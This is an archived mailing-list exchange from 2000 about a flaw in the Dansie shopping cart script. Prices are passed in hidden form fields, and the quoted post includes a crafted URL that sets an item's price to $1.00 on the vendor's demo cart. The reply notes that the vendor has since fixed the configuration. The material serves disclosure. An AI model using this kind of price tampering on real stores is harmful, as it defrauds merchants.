On Fri, 14 Apr 2000, tombow wrote: > if installing a backdoor in the cart software wasn't bad enough.. the > whole implimentation of pricing and adding items to cart is crap.. > > example form to add items to your cart (kindly provided on the publishers > site using the demo cart they set up for us): > > *snip* > > <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl"> > > Black Leather purse with leather straps<BR> > Price: $20.00<BR> > > <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> > <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> > <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling > --> > <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> > <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html"> > <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps"> > > <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart"> > </FORM> > > *snip* > > > a couple of quick alterations and we can now add: > > one piece of crap cart software.. > > >http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables > This occurs because the person who configured the script failed to set "persoanl variable #66". Dansie has since done that at www.dansie.net so that the above URL now fails to change the shopping cart variables. Pete
